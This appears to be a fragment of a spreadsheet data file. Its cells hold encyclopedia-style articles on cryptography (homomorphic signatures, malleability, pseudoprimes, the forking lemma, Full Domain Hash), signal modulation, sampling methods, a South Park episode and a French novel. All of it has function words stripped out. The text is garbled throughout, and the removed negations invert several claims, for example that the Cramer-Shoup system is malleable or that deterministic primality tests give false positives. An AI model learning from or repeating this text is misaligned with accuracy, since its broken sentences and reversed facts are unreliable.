arbitrary density functions inverse transform sampling distributions whose known ratio uniforms, combining change variables rejection sampling slice sampling ziggurat algorithm, monotonically decreasing density functions well symmetric unimodal distributions convolution random number generator, sampling method itself: describes arithmetics existing sampling methods generate involved distributions.generic methods generating correlated samples (often necessary unusually-shaped high-dimensional distributions): markov chain monte carlo, general principle metropolis–hastings algorithm gibbs sampling slice sampling reversible-jump markov chain monte carlo, number dimensions fixed (e.g. estimating mixture model simultaneously estimating number mixture components) particle filters, observed data connected markov chain processed sequentiallyfor generating normal distribution: box–muller transform marsaglia polar methodfor generating poisson distribution: poisson distribution#generating poisson-distributed random variables software libraries scientific library section entitled "random number distributions" routines sampling twenty different distributions. footnotes literature devroye, (1986) non-uniform random variate generation. york: springer fishman, g.s. (1996) monte carlo. concepts, algorithms, applications. york: springer hörmann, leydold, derflinger (2004,2011) automatic nonuniform random variate generation. berlin: springer. knuth, d.e. (1997) computer programming, vol. seminumerical algorithms, chapter 3.4.1 (3rd edition). ripley, b.d. (1987) stochastic simulation. wiley.</t>
  </si>
  <si>
    <t>Homomorphic signatures for network coding</t>
  </si>
  <si>
    <t>network coding shown optimally bandwidth network, maximizing information flow scheme inherently vulnerable pollution attacks malicious nodes network. node injecting garbage quickly affect many receivers. pollution network packets spreads quickly since output (even honest node corrupted least incoming packets corrupted. attacker easily corrupt packet even encrypted either forging signature producing collision hash function. this give attacker access packets ability corrupt them. denis charles, kamal jain kristin lauter designed homomorphic encryption signature scheme network coding prevent pollution attacks.the homomorphic property signatures allows nodes sign linear combination incoming packets without contacting signing authority. scheme computationally infeasible node sign linear combination packets without disclosing linear combination used generation packet. furthermore, prove signature scheme secure well known cryptographic assumptions hardness discrete logarithm problem computational elliptic curve diffie–hellman. network coding {\displaystyle g=(v,e)} directed graph {\displaystyle set, whose elements called vertices nodes, {\displaystyle ordered pairs vertices, called arcs, directed edges, arrows. source {\displaystyle s\in wants transmit file {\displaystyle {\displaystyle t\subseteq vertices. chooses vector space {\displaystyle w/\mathbb _{p}} (say dimension {\displaystyle {\displaystyle prime, views data transmitted bunch vectors {\displaystyle w_{1},\ldots ,w_{k}\in source creates augmented vectors {\displaystyle v_{1},\ldots ,v_{k}} setting {\displaystyle v_{i}=(0,\ldots ,0,1,\ldots ,0,w_{i_{1}},\ldots ,w{i_{d}})} {\displaystyle w_{i_{j}}} {\displaystyle coordinate vector {\displaystyle w_{i}} there {\displaystyle (i-1)} zeros first appears {\displaystyle v_{i}} assume without loss generality vectors {\displaystyle v_{i}} linearly independent. denote linear subspace {\displaystyle \mathbb _{p}^{k+d}} spanned vectors {\displaystyle each outgoing edge {\displaystyle e\in computes linear combination, {\displaystyle y(e)} vectors entering vertex {\displaystyle v=in(e)} edge originates, {\displaystyle y(e)=\sum _{f:\mathrm {out} (f)=v}(m_{e}(f)y(f))} {\displaystyle m_{e}(f)\in \mathbb _{p}} consider source {\displaystyle input edges carrying {\displaystyle vectors {\displaystyle w_{i}} induction, vector {\displaystyle y(e)} edge linear combination {\displaystyle y(e)=\sum _{1\leq i\leq k}(g_{i}(e)v_{i})} vector {\displaystyle k-dimensional vector {\displaystyle g(e)=(g_{1}(e),\ldots ,g_{k}(e))} simply first coordinates vector {\displaystyle y(e)} call matrix whose rows vectors {\displaystyle g(e_{1}),\ldots ,g(e_{k})} {\displaystyle e_{i}} incoming edges vertex {\displaystyle t\in global encoding matrix {\displaystyle denote {\displaystyle g_{t}} practice encoding vectors chosen random matrix {\displaystyle g_{t}} invertible high probability. thus, receiver, receiving {\displaystyle y_{1},\ldots ,y_{k}} find {\displaystyle w_{1},\ldots ,w_{k}} solving {\displaystyle {\begin{bmatrix}y'\\y_{2}'\\\vdots \\y_{k}'\end{bmatrix}}=g_{t}{\begin{bmatrix}w_{1}\\w_{2}\\\vdots \\w_{k}\end{bmatrix}}} {\displaystyle y_{i}'} vectors formed removing first {\displaystyle coordinates vector {\displaystyle y_{i}} decoding receiver each receiver, {\displaystyle t\in gets {\displaystyle vectors {\displaystyle y_{1},\ldots ,y_{k}} random linear combinations {\displaystyle v_{i}} fact, {\displaystyle y_{i}=(\alpha _{i_{1}},\ldots ,\alpha _{i_{k}},a_{i_{1}},\ldots ,a_{i_{d}})} {\displaystyle y_{i}=\sum _{1\leq j\leq k}(\alpha _{ij}v_{j}).} thus invert linear transformation find {\displaystyle v_{i}} high probability. history krohn, freedman mazieres proposed theory 2004 hash function {\displaystyle h:v\longrightarrow that: {\displaystyle collision resistant hard find {\displaystyle {\displaystyle {\displaystyle h(x)=h(y)} {\displaystyle homomorphism {\displaystyle h(x+y)=h(x)+h(y)} .then server securely distribute {\displaystyle h(v_{i})} receiver, check {\displaystyle y=\sum _{1\leq i\leq k}(\alpha _{i}v_{i})} check whether {\displaystyle h(y)=\sum _{1\leq i\leq k}(\alpha _{i}h(v_{i}))} problem method server needs transfer secure information receivers. hash functions {\displaystyle needs transmitted nodes network separate secure channel. {\displaystyle expensive compute secure transmission {\displaystyle economical either. advantages homomorphic signatures establishes authentication addition detecting pollution. need distributing secure hash digests. smaller lengths general suffice. signatures length bits much security 1024 signatures. public information change subsequent file transmission. signature scheme homomorphic property signatures allows nodes sign linear combination incoming packets without contacting signing authority. elliptic curves cryptography finite field elliptic curve cryptography finite field approach public-key cryptography based algebraic structure elliptic curves finite fields. {\displaystyle \mathbb _{q}} finite field {\displaystyle power then elliptic curve {\displaystyle {\displaystyle \mathbb _{q}} curve given equation form {\displaystyle y^{2}=x^{3}+ax+b,\,} {\displaystyle a,b\in \mathbb _{q}} {\displaystyle 4a^{3}+27b^{2}\not {\displaystyle k\supseteq \mathbb _{q}} then, {\displaystyle e(k)=\{(x,y)|y^{2}=x^{3}+ax+b\}\bigcup \{o\}} forms abelian group identity. group operations performed efficiently. weil pairing weil pairing construction roots unity means functions elliptic curve {\displaystyle constitute pairing (bilinear form, though multiplicative notation) torsion subgroup {\displaystyle {\displaystyle e/\mathbb _{q}} elliptic curve {\displaystyle \mathbb {\bar {f}} _{q}} algebraic closure {\displaystyle \mathbb _{q}} {\displaystyle integer, relatively prime characteristic field {\displaystyle \mathbb _{q}} group {\displaystyle -torsion points, {\displaystyle e[m]={p\in e(\mathbb {\bar {f}} _{q}):mp=o}} {\displaystyle e/\mathbb _{q}} elliptic curve {\displaystyle \gcd(m,q)=1} {\displaystyle e[m]\cong (\mathbb /m\mathbb )*(\mathbb /m\mathbb there {\displaystyle e_{m}:e[m]*e[m]\rightarrow _{m}(\mathbb _{q})} that: (bilinear) {\displaystyle e_{m}(p+r,q)=e_{m}(p,q)e_{m}(r,q){\text{ }}e_{m}(p,q+r)=e_{m}(p,q)e_{m}(p,r)} (non-degenerate) {\displaystyle e_{m}(p,q)=1} implies {\displaystyle q=o} (alternating) {\displaystyle e_{m}(p,p)=1} .also, {\displaystyle e_{m}} computed efficiently. homomorphic signatures {\displaystyle prime {\displaystyle prime power. {\displaystyle v/\mathbb _{p}} vector space dimension {\displaystyle {\displaystyle e/\mathbb _{q}} elliptic curve {\displaystyle p_{1},\ldots ,p_{d}\in e[p]} define {\displaystyle h:v\longrightarrow e[p]} follows: {\displaystyle h(u_{1},\ldots ,u_{d})=\sum _{1\leq i\leq d}(u_{i}p_{i})} function {\displaystyle arbitrary homomorphism {\displaystyle {\displaystyle e[p]} server chooses {\displaystyle s_{1},\ldots ,s_{d}} secretly {\displaystyle \mathbb _{p}} publishes point {\displaystyle p-torsion {\displaystyle e_{p}(p_{i},q)\not also publishes {\displaystyle (p_{i},s_{i}q)} {\displaystyle 1\leq i\leq signature vector {\displaystyle v=u_{1},\ldots ,u_{d}} {\displaystyle \sigma (v)=\sum _{1\leq i\leq d}(u_{i}s_{i}p_{i})} note: this signature homomorphic since computation homomorphism. signature verification given {\displaystyle v=u_{1},\ldots ,u_{d}} signature {\displaystyle \sigma verify {\displaystyle {\begin{aligned}e_{p}(\sigma ,q)&amp;=e_{p}\left(\sum _{1\leq i\leq d}(u_{i}s_{i}p_{i}),q\right)\\&amp;=\prod _{i}e_{p}(u_{i}s_{i}p_{i},q)\\&amp;=\prod _{i}e_{p}(u_{i}p_{i},s_{i}q)\end{aligned}}} verification crucially uses bilinearity weil-pairing. system setup server computes {\displaystyle \sigma (v_{i})} {\displaystyle 1\leq i\leq transmits {\displaystyle v_{i},\sigma (v_{i})} edge {\displaystyle computing {\displaystyle y(e)=\sum _{f\in e:\mathrm {out} (f)=\mathrm {in} (e)}(m_{e}(f)y(f))} also compute {\displaystyle \sigma (y(e))=\sum _{f\in e:\mathrm {out} (f)=\mathrm {in} (e)}(m_{e}(f)\sigma (y(f)))} elliptic curve {\displaystyle signature point elliptic curve coordinates {\displaystyle \mathbb _{q}} thus size signature {\displaystyle 2\log bits (which constant times {\displaystyle log(p)} bits, depending relative size {\displaystyle {\displaystyle transmission overhead. computation signature {\displaystyle h(e)} vertex requires {\displaystyle o(d_{in}\log p\log ^{1+\epsilon }q)} operations, {\displaystyle d_{in}} in-degree vertex {\displaystyle in(e)} verification signature requires {\displaystyle o((d+k)\log ^{2+\epsilon }q)} operations. proof security attacker produce collision hash function. given {\displaystyle (p_{1},\ldots ,p_{r})} points {\displaystyle e[p]} find {\displaystyle a=(a_{1},\ldots ,a_{r})\in \mathbb _{p}^{r}} {\displaystyle b=(b_{1},\ldots ,b_{r})\in \mathbb _{p}^{r}} {\displaystyle a\not {\displaystyle \sum _{1\leq i\leq r}(a_{i}p_{i})=\sum _{1\leq j\leq r}(b_{j}p_{j}).} proposition: there polynomial time reduction discrete cyclic group order {\displaystyle elliptic curves hash-collision. {\displaystyle r=2} {\displaystyle xp+yq=up+vq} thus {\displaystyle (x-u)p+(y-v)q=0} claim {\displaystyle x\not {\displaystyle y\not suppose {\displaystyle x=u} would {\displaystyle (y-v)q=0} {\displaystyle point order {\displaystyle prime) thus {\displaystyle y-u\equiv 0{\bmod {p}}} words {\displaystyle y=v} {\displaystyle \mathbb _{p}} this contradicts assumption {\displaystyle (x,y)} {\displaystyle (u,v)} distinct pairs {\displaystyle \mathbb _{2}} thus {\displaystyle q=-(x-u)(y-v)^{-1}p} inverse taken modulo {\displaystyle things. either take {\displaystyle p_{1}=p} {\displaystyle p_{2}=q} {\displaystyle p_{i}=o} {\displaystyle case proof reduces case {\displaystyle r=2} take {\displaystyle p_{1}=r_{1}p} {\displaystyle p_{i}=r_{i}q} {\displaystyle r_{i}} chosen random {\displaystyle \mathbb _{p}} equation unknown (the discrete {\displaystyle quite possible equation involve unknown. however, happens small probability argue next. suppose algorithm hash-collision gave {\displaystyle ar_{1}p+\sum _{2\leq i\leq r}(b_{i}r_{i}q)=0.} then long {\displaystyle \sum _{2\leq i\leq r}b_{i}r_{i}\not \equiv 0{\bmod {p}}} solve discrete {\displaystyle r_{i}} unknown oracle hash-collision interchange order process occurs. words, given {\displaystyle b_{i}} {\displaystyle 2\leq i\leq zero, probability {\displaystyle r_{i}} chose satisfies {\displaystyle \sum _{2\leq i\leq r}(b_{i}r_{i})=0} clear latter probability {\displaystyle \over thus high probability solve discrete {\displaystyle shown producing hash collisions scheme difficult. method adversary foil system forging signature. this scheme signature essentially aggregate signature version boneh-lynn-shacham signature scheme. here shown forging signature least hard solving elliptic curve diffie–hellman problem. known solve problem elliptic curves computing discrete-logs. thus forging signature least hard solving computational co-diffie–hellman elliptic curves probably hard computing discrete-logs. also network coding homomorphic encryption elliptic curve cryptography weil pairing elliptic curve diffie–hellman elliptic curve digital signature algorithm references external links comprehensive view live network coding system signatures network coding(presentation) ciss 2006, princeton university buffalo lecture notes coding theory atri rudra</t>
  </si>
  <si>
    <t>Malleability (cryptography)</t>
  </si>
  <si>
    <t>malleability property cryptographic algorithms. encryption algorithm "malleable" possible transform ciphertext another ciphertext decrypts related plaintext. that given encryption plaintext {\displaystyle possible generate another ciphertext decrypts {\displaystyle f(m)} known function {\displaystyle without necessarily knowing learning {\displaystyle malleability often undesirable property general-purpose cryptosystem, since allows attacker modify contents message. example, suppose bank uses stream cipher hide financial information, user sends encrypted message containing, say, "transfer $0000100.00 account #199." attacker modify message wire, guess format unencrypted message, attacker could change amount transaction, recipient funds, e.g. "transfer $0100000.00 account #227". malleability refer attacker's ability read encrypted message. both tampering, attacker cannot read encrypted message. hand, cryptosystems malleable design. words, circumstances viewed feature anyone transform encryption {\displaystyle valid encryption {\displaystyle f(m)} (for restricted class functions {\displaystyle without necessarily learning {\displaystyle such schemes known homomorphic encryption schemes. cryptosystem semantically secure chosen plaintext attacks even non-adaptive chosen ciphertext attacks (cca1) still malleable. however, security adaptive chosen ciphertext attacks (cca2) equivalent non-malleability. example malleable cryptosystems stream cipher, ciphertext produced taking exclusive plaintext pseudorandom stream based secret {\displaystyle {\displaystyle e(m)=m\oplus s(k)} adversary construct encryption {\displaystyle m\oplus {\displaystyle {\displaystyle e(m)\oplus t=m\oplus t\oplus s(k)=e(m\oplus cryptosystem, plaintext {\displaystyle encrypted {\displaystyle e(m)=m^{e}{\bmod {n}}} {\displaystyle (e,n)} public key. given ciphertext, adversary construct encryption {\displaystyle {\displaystyle {\textstyle e(m)\cdot t^{e}{\bmod {n}}=(mt)^{e}{\bmod {n}}=e(mt)} reason, commonly used together padding methods oaep pkcs1. elgamal cryptosystem, plaintext {\displaystyle encrypted {\displaystyle e(m)=(g^{b},ma^{b})} {\displaystyle (g,a)} public key. given ciphertext {\displaystyle (c_{1},c_{2})} adversary compute {\displaystyle (c_{1},t\cdot c_{2})} valid encryption {\displaystyle {\displaystyle contrast, cramer-shoup system (which based elgamal) malleable. paillier, elgamal, cryptosystems, also possible combine several ciphertexts together useful produce related ciphertext. paillier, given public encryption {\displaystyle m_{1}} {\displaystyle m_{2}} compute valid encryption {\displaystyle m_{1}+m_{2}} elgamal rsa, combine encryptions {\displaystyle m_{1}} {\displaystyle m_{2}} obtain valid encryption product {\displaystyle m_{1}m_{2}} block ciphers cipher block chaining mode operation, example, partly malleable: flipping ciphertext block completely mangle plaintext decrypts result flipped plaintext next block. this allows attacker 'sacrifice' block plaintext order change data next one, possibly managing maliciously alter message. this essentially core idea padding oracle attack cbc, allows attacker decrypt almost entire ciphertext without knowing key. many reasons, message authentication code required guard method tampering. complete non-malleability fischlin, 2005, defined notion complete non-malleability ability system remain non-malleable giving adversary additional power choose public could function original public key. words, adversary able come ciphertext whose underlying plaintext related original message relation also takes public keys account. also homomorphic encryption references</t>
  </si>
  <si>
    <t>Full cycle</t>
  </si>
  <si>
    <t>pseudorandom number generator (prng), full cycle full period behavior prng valid states. particular, prng said full cycle valid seed state, prng traverses every valid state returning seed state, i.e., period equal cardinality state space. restrictions parameters prng possess full cycle known certain types prngs, linear congruential generators linear-feedback shift registers. there general method determine whether prng algorithm full-cycle short exhausting state space, exponentially large compared size algorithm's internal state. example c/c++) given random number seed greater equal zero, total sample size greater increment coprime total sample size, full cycle generated following logic. each nonnegative number smaller sample size occurs exactly once. example python) also linear congruential generator xorshift</t>
  </si>
  <si>
    <t>Pseudoprime</t>
  </si>
  <si>
    <t>pseudoprime probable prime integer shares property common prime numbers) actually prime. pseudoprimes classified according property primes satisfy. some sources term pseudoprime describe probable primes, composite numbers actual primes. pseudoprimes primary importance public-key cryptography, makes difficulty factoring large numbers prime factors. carl pomerance estimated 1988 would cost million factor number digits, $100 billion factor 200-digit number (the cost today dramatically lower still prohibitively high). finding large prime numbers needed also expensive, various probabilistic primality tests used, rare cases inappropriately deliver composite numbers instead primes. hand, deterministic primality tests, primality test, give false positives; pseudoprimes respect them. fermat pseudoprimes fermat's little theorem states prime coprime ap−1 divisible integer composite integer divides ax−1 called fermat pseudoprime base follows fermat pseudoprime base coprime some sources variations definition, example allow numbers pseudoprimes.an integer fermat pseudoprime values coprime called carmichael number. classes references</t>
  </si>
  <si>
    <t>Forking lemma</t>
  </si>
  <si>
    <t>forking lemma number related lemmas cryptography research. lemma states adversary (typically probabilistic turing machine), inputs drawn distribution, produces output property non-negligible probability, non-negligible probability, adversary re-run inputs random tape, second output also property. this concept first used david pointcheval jacques stern "security proofs signature schemes," published proceedings eurocrypt 1996. paper, forking lemma specified terms adversary attacks digital signature scheme instantiated random oracle model. they show adversary forge signature non-negligible probability, non-negligible probability adversary random tape create second forgery attack different random oracle. forking lemma later generalized mihir bellare gregory neven. forking lemma used generalized prove security variety digital signature schemes random-oracle based cryptographic constructions. statement lemma generalized version lemma stated follows. probabilistic algorithm, inputs ..., outputs pair refers random tape (that random choices make). suppose probability distribution drawn, size values drawn according uniform distribution. probability inputs distributed described, output greater equal define "forking algorithm" proceeds follows, input pick random tape pick ..., uniformly input ..., produce return pick h'j, ..., uniformly input ..., hj−1, h'j, ..., h'q; produce (j', y'). return y'), otherwise, return 0).let probability outputs triple starting given input chosen randomly then {\displaystyle {\text{frk}}\geq {\text{acc}}\cdot \left({\frac {\text{acc}}{q}}-{\frac {1}{h}}\right).} intuition idea think running times related executions, process "forks" certain point, input examined. alternate version, remaining inputs re-generated generated normal way. point process forks something want decide later, possibly based behavior first time around: lemma statement chooses branching point based output requirement technical required many uses lemma. (note since chosen randomly large, usually case, probability values distinct extremely small.) example example, algorithm breaking digital signature scheme random oracle model. then would public parameters (including public key) attacking, would output random oracle distinct input. forking lemma would possible, given different random signatures message, solve underlying hard problem. adversary forges once, however, gives rise forges twice message non-negligible probability forking lemma. when attempts forge message consider output forgery, unique query random oracle assumed query point, successful non-negligible probability). outputs incorrect forgery, consider output y).) forking lemma, probability (frk) obtaining good forgeries message different random oracle outputs (that h'j) non-negligible also non-negligible. this allows prove underlying hard problem indeed hard, adversary forge signatures. this essence proof given pointcheval stern modified elgamal signature scheme adaptive adversary. known issues application forking lemma reduction provided forking lemma tight. pointcheval stern proposed security arguments digital signatures blind signature using forking lemma. claus schnorr provided attack blind schnorr signatures schemes, {\displaystyle polylog(n)} concurrent executions (the case studied proven secure pointcheval stern). polynomial-time attack, {\displaystyle \omega (n)} concurrent executions, shown 2020 benhamouda, lepoint, raykova, orrù. schnorr also suggested enhancements securing blind signatures schemes based discrete logarithm problem. references</t>
  </si>
  <si>
    <t>Full Domain Hash</t>
  </si>
  <si>
    <t>cryptography, full domain hash (fdh) rsa-based signature scheme follows hash-and-sign paradigm. provably secure (i.e., existentially unforgeable adaptive chosen-message attacks) random oracle model. involves hashing message using function whose image size equals size modulus, raising result secret exponent. exact security full domain hash random oracle model, {\displaystyle (t',\epsilon -secure, full domain hash signature scheme {\displaystyle (t,\epsilon -secure where, hash {\displaystyle {\begin{aligned}t&amp;=t'-(q_{\text{hash}}+q_{\text{sig}}+1)\cdot {\mathcal {o}}\left(k^{3}\right)\\\epsilon &amp;=\left(1+{\frac {1}{q_{\text{sig}}}}\right)^{q_{\text{sig}}+1}\cdot q_{\text{sig}}\cdot \epsilon '\end{aligned}}} .for large {\displaystyle q_{\text{sig}}} reduces {\displaystyle \epsilon \sim \exp(1)\cdot q_{\text{sig}}\cdot \epsilon this means exists algorithm forge signature runs time computes hash {\displaystyle q_{\text{hash}}} hashes, asks {\displaystyle q_{\text{sig}}} signatures succeeds probability {\displaystyle \epsilon must also exist algorithm breaks probability {\displaystyle \epsilon time {\displaystyle references jean-sébastien coron(af): exact security full domain hash. crypto 2000: 229–235 (pdf) mihir bellare, phillip rogaway: exact security digital signatures sign rabin. eurocrypt 1996: 399–416 (pdf)</t>
  </si>
  <si>
    <t>Amplitude-shift keying</t>
  </si>
  <si>
    <t>amplitude-shift keying (ask) form amplitude modulation represents digital data variations amplitude carrier wave. system, symbol, representing bits, sent transmitting fixed-amplitude carrier wave fixed frequency specific time duration. example, symbol represents single bit, carrier signal could transmitted nominal amplitude input value transmitted reduced amplitude input value digital modulation scheme uses finite number distinct signals represent digital data. uses finite number amplitudes, assigned unique pattern binary digits. usually, amplitude encodes equal number bits. each pattern bits forms symbol represented particular amplitude. demodulator, designed specifically symbol-set used modulator, determines amplitude received signal maps back symbol represents, thus recovering original data. frequency phase carrier kept constant. like also linear sensitive atmospheric noise, distortions, propagation conditions different routes pstn, etc. both modulation demodulation processes relatively inexpensive. technique also commonly used transmit digital data optical fiber. transmitters, binary represented short pulse light binary absence light. laser transmitters normally fixed "bias" current causes device emit light level. this level represents binary higher-amplitude lightwave represents binary simplest common form operates switch, using presence carrier wave indicate binary absence indicate binary zero. this type modulation called on-off keying (ook), used radio frequencies transmit morse code (referred continuous wave operation), more sophisticated encoding schemes developed represent data groups using additional amplitude levels. instance, four-level encoding scheme represent bits shift amplitude; eight-level scheme represent three bits; these forms amplitude-shift keying require high signal-to-noise ratio recovery, nature much signal transmitted reduced power. system divided three blocks. first represents transmitter, second linear model effects channel, third shows structure receiver. following notation used: ht(f) carrier signal transmission hc(f) impulse response channel n(t) noise introduced channel hr(f) filter receiver number levels used transmission time generation symbolsdifferent symbols represented different voltages. maximum allowed value voltage possible values range [−a, given {\displaystyle v_{i}={\frac {2a}{l-1}}i-a;\quad i=0,1,\dots ,l-1} difference voltage {\displaystyle \delta ={\frac {2a}{l-1}}} considering picture, symbols v[n] generated randomly source impulse generator creates impulses area v[n]. these impulses sent filter sent channel. words, symbol different carrier wave sent relative amplitude. transmitter, signal s(t) expressed form: {\displaystyle s(t)=\sum _{n=-\infty }^{\infty }v[n]\cdot h_{t}(t-nt_{s})} receiver, filtering signal {\displaystyle z(t)=n_{r}(t)+\sum _{n=-\infty }^{\infty }v[n]\cdot g(t-nt_{s})} notation: {\displaystyle {\begin{aligned}n_{r}(t)&amp;=n(t)*h_{r}(t)\\g(t)&amp;=h_{t}(t)*h_{c}(t)*h_{r}(t)\end{aligned}}} indicates convolution signals. after conversion signal z[k] expressed form: {\displaystyle z[k]=n_{r}[k]+v[k]g[0]+\sum _{n\neq k}v[n]g[k-n]} relationship, second term represents symbol extracted. others unwanted: first effect noise, third intersymbol interference. filters chosen g(t) satisfy nyquist criterion, intersymbol interference value zero, {\displaystyle z[k]=n_{r}[k]+v[k]g[0]} transmission affected noise. probability error probability density function error given size modelled gaussian function; mean value relative sent value, variance given {\displaystyle \sigma _{n}^{2}=\int _{-\infty }^{+\infty }\phi _{n}(f)\cdot |h_{r}(f)|^{2}df} {\displaystyle \phi _{n}(f)} spectral density noise within band continuous fourier transform impulse response filter (f). probability making error given {\displaystyle p_{e}=p_{e|h_{0}}\cdot p_{h_{0}}+p_{e|h_{1}}\cdot p_{h_{1}}+\cdots +p_{e|h_{l-1}}\cdot p_{h_{l-1}}=\sum _{k=0}^{l-1}p_{e|h_{k}}\cdot p_{h_{k}}} where, example, {\displaystyle p_{e|h_{0}}} conditional probability making error given symbol sent {\displaystyle p_{h_{0}}} probability sending symbol probability sending symbol same, then: {\displaystyle p_{h_{i}}={\frac {1}{l}}} represent probability density functions plot possible value voltage transmitted, picture like (the particular case {\displaystyle l=4} shown): probability making error single symbol sent area gaussian function falling functions symbols. shown cyan them. call {\displaystyle p^{+}} area side gaussian, areas {\displaystyle 2lp^{+}-2p^{+}} total probability making error expressed form: {\displaystyle p_{e}=2\left(1-{\frac {1}{l}}\right)p^{+}} calculate value {\displaystyle p^{+}} order that, move origin reference wherever want: area function change. situation like shown following picture: matter gaussian function considering, area want calculate same. value looking given following integral: erfc {\displaystyle p^{+}=\int _{\frac {ag(0)}{l-1}}^{\infty }{\frac {1}{{\sqrt {2\pi }}\sigma _{n}}}e^{-{\frac {x^{2}}{2\sigma _{n}^{2}}}}dx={\frac {1}{2}}\operatorname {erfc} \left({\frac {ag(0)}{{\sqrt {2}}(l-1)\sigma _{n}}}\right)} erfc {\displaystyle \operatorname {erfc} (x)} complementary error function. putting results together, probability make error erfc {\displaystyle p_{e}=\left(1-{\frac {1}{l}}\right)\operatorname {erfc} \left({\frac {ag(0)}{{\sqrt {2}}(l-1)\sigma _{n}}}\right)} formula easily understand probability make error decreases maximum amplitude transmitted signal amplification system becomes greater; hand, increases number levels power noise becomes greater. this relationship valid intersymbol interference, i.e. {\displaystyle g(t)} nyquist function. also frequency-shift keying (fsk) external links calculating sensitivity amplitude shift keying (ask) receiver archived 2009-08-29 wayback machine</t>
  </si>
  <si>
    <t>Error-correcting codes with feedback</t>
  </si>
  <si>
    <t>mathematics, computer science, telecommunication, information theory, searching theory, error-correcting codes feedback refers error correcting codes designed work presence feedback receiver sender. problem alice (the sender) wishes send value (the receiver). communication channel alice imperfect, introduce errors. solution error-correcting code encoding message successfully understand value intended alice, even message alice sends message receives differ. error-correcting code feedback, channel two-way: send feedback alice message received. noisy feedback error-correcting code without noisy feedback, feedback received sender always free errors. error-correcting code noisy feedback, errors occur feedback, well message. error-correcting code noiseless feedback equivalent adaptive search strategy errors. history 1956, claude shannon introduced discrete memoryless channel noiseless feedback. 1961, alfréd rényi introduced bar-kochba game (also known twenty questions), given percentage wrong answers, calculated minimum number randomly chosen questions determine answer. 1964 dissertation, elwyn berlekamp considered error correcting codes noiseless feedback. berlekamp's scenario, receiver chose subset possible messages asked sender whether given message subset, 'yes' 'no' answer. based answer, receiver chose subset repeated process. game complicated noise; answers wrong. sources deppe, christian (2007), "coding feedback searching lies", imre csiszár; gyula o.h. katona; gabor tardos (eds.), entropy, search, complexity, bolyai society mathematical studies, vol. berlin-heidelberg: springer, 27–70, doi:10.1007/978-3-540-32777-6, isbn 978-3-540-32573-4. hill, (1995), searching lies, cambridge london mathematical society lecture note series, surveys combinatorics, cambridge: cambridge univ. press, 41–70, isbn 0-521-49797-3. references also noisy channel coding theorem</t>
  </si>
  <si>
    <t>Wieners Out</t>
  </si>
  <si>
    <t>"wieners out" fourth episode twentieth season american animated television series south park. 271st episode series overall, first aired comedy central united states october 2016. episode lampooned modern social protest movements campaigns (like free nipple black lives matter) commented internet anonymity, also progressing plot themes season's previous episodes. plot danish narrator explains danish history dealing trolls quest take newest variety, internet troll. gerald broflovski feels pressure found trolling skankhunt42, tries much cover meanwhile, kyle feels guilt rift boys girls. when tries bring together, strains relationships further, butters takes leadership role elementary school girls convince long-distance girlfriend charlotte dump online. takes pants, exposing penis, protest feeling shamed gender, girls' volleyball game. most boys immediately follow suit, disgusting girls even more. gerald struggles trolling withdrawal, eventually meeting fellow troll known dildo schwaggins bridge, warns gerald upcoming attack danes. gerald eventually succumbs pressure sheila catches bathroom trolling ipad sheila bought him. still reluctant reveal inner troll self, gerald lies sheila, saying watching "piss porn", agrees urinated cover secret. even attends addiction meeting, turns member berry addicts instead. when talking cartman heidi turner, boyfriend girlfriend, kyle realizes able stop butters, leading protest marches without pants, worsening rift own, attempts cartman side. cartman refuses since feels happier heidi, away divisiveness groups social media. schwaggins shows gerald video news explains danish website known troll trace designed track real-life identity internet trolls coming online. founder site threatens expose trolls everywhere, although aware methods greater effect stripping anonymity anyone posting internet. schwaggins gerald retreat group trolls. kyle meets boys girls school cafeteria, announces agrees butters' protest. pulls penis front them, girls leave disgust, boys cheer carry shoulders. reception jesse schedeen rated episode commented loved "more focused episode week series continues lampoon social media." jeremy lambert mania gave summarizing review comment "there's denying brilliance south park focused story." caffrey a.v. club rated episode found scene sheila urinating gerald kyle watch doorway "the kind nasty sight that's become staple south park universe." chris longo geek rated stars, still continuing theory season still eric cartman's south park, we've building decades." references external links "wieners out" full episode south park studios "wieners out" imdb</t>
  </si>
  <si>
    <t>Anéantir</t>
  </si>
  <si>
    <t>anéantir ([a.ne.ɑ̃.tiʁ], lit. 'destroy') novel michel houellebecq, published january 2022 éditions flammarion. novel's first print 300,000 copies. summary novel mixes espionage politics, mystery romanticism. jean birnbaum monde called "political thriller veers metaphysical meditation." envisions years 2026 2027 france period decline. however, france shows signs revival without labor strikes "the ruling classes populace reached unprecedented levels." country nonetheless remains state moral decay high levels unemployment rural poverty. begins 2027 french presidential election outgoing president, although named, implied emmanuel macron. right-wing figures marine éric zemmour, however, appear name.paul raison, novel's protagonist, adviser confidant minister economy finance, bruno juge. édouard raison, former civil servant dgsi. nation plunging feverish presidential campaign, mysterious cyberattacks start take place. sophisticated nature attacks leaves best computer scientists dgsi scrambling answers. videos posted internet shows virtual beheading minister bruno juge guillotine. this environment cyberterrorism defines atmosphere election. young outgoing president completing second term, "given fantasies start-up nation first election, objectively resulted creation precarious underpaid jobs." this parallels macron's promise start-up nation, critics echoed similar evaluations election candidates include, presidential majority side, minister economy character resembles media personality cyril hanouna. opposition, young far-right candidate dangerously close behind favorite polls.at pages, anéantir unusual slow pace tone, characterised compassion irony. raison's relationship wife, prudence, official treasury, become strained, ties siblings long disjointed. stroke father presents opportunity siblings cécile, fervent catholic, aurélien, sensitive artist, paul, énarque search meaning, repair relationship. they determined father, sick vegetative state, center wasting away. however, paul later stricken illness. narrative explores themes faith love. france inter described narrative "houellebecq somewhere nihilism romanticism." europe dimitri pavlenko said, "you might think sinister pessimistic houellebecq. many characters searching goodness message book could "love saves". characters bastien doutremont forty-something computer scientist working contractor general directorate internal security (dgsi) fred forty-something computer scientist working contractor general directorate internal security (dgsi) bruno juge minister economy finance paul raison official minister economy finance prudence official treasury department, wife paul raison édouard raison father paul raison madeleine wife édouard raison suzanne raison mother paul raison, conservationist cécile raison sister paul raison (and daughter édouard suzanne raison) hervé husband cécile raison, unemployed notary aurélien raison brother paul raison (and édouard suzanne raison), conservationist véronique former wife paul raison influences character bruno juge, minister economy finance, likely reference bruno maire (minister economy finance time novel's publication). october 2021, bruno maire, personal friend houellebecq, revealed elements novel's plot. online leak less three weeks publication, first pages novel illegally distributed social media, and, december 2021, complete digital copy circulated, presumably made scan book since digital version released. only print copies sent literary journalists, formal request publisher reveal details novel's plot december 2021. reception reviews anéantir largely positive. jean birnbaum monde wrote, "the poignant pages novel manages bring life, amid solitude dereliction, fleeting gestures make cry." étienne campion marianne called "profound novel illness, suffering, agony, death, surprise, even irritate, many readers." daily newspapers figaro libération, positioned opposing sides political spectrum, agreement praising success novel's storyline. 